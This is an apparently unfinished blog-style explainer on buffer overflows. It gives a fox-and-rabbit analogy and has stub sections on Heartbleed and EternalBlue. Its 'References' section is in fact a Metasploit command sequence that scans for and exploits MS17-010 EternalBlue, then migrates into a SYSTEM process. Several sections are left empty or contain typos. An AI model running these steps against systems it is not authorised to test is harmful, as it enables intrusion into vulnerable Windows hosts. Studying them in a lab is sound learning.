Buffer Overflow

Overview

The idea of a buffer overflow attack is quite simple, though the implementation might initially be difficult to digest. I am exploring this notion and visualising it in this article.

Mechanics

Imagine you have a job you don’t really like (I think most of us have had such an experience at least once in our life 😢). And also, imagine that you are being highly underpaid. Your job is simple and ridiculous: place rabbits 🐇 into one set of boxes and foxes 🦊 - into another. You happen to have 6 boxes 📦📦📦📦📦📦 for foxes 🦊 and 4 📦📦📦📦 for rabbits 🐇. However, you were given 4 rabbits 🐇🐇🐇🐇 and 7 foxes 🦊🦊🦊🦊🦊🦊🦊. So, one fox 🦊 doesn’t have its fox box 📦. However, there are also rabbit 🐇 boxes 📦 right nearby. So, even though you were explicitly told not to place foxes into rabbit boxes and vice versa since you don’t give a shit, you put a fox into a rabbit fox. What happens? One can only guess… 🤔. Long story short: the fox eats the rabbit, and now you have 7 foxes and only 3 rabbits 🐇. Alas! If only you’d followed the manual 📖…. Most likely, one would get fired after such a mistake, but we can’t fire the compiler, so that would happen if the developer was not using a memory-safe language or wasn’t careful enough. Now, to the technicalities.

💔 Heartbleed

This is about … .

Eternal Blue

It’s basically a biffer overflow vulnerability in the SMB module.

References

nmap --script vuln <ip>
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue 
set RHOSTS <targets IP>
exploit
# you will get a session if the system is vulnerable

ps # list processes, choose the one with System permissions if your permissions are not enough

migrate <pid> # try different PIDs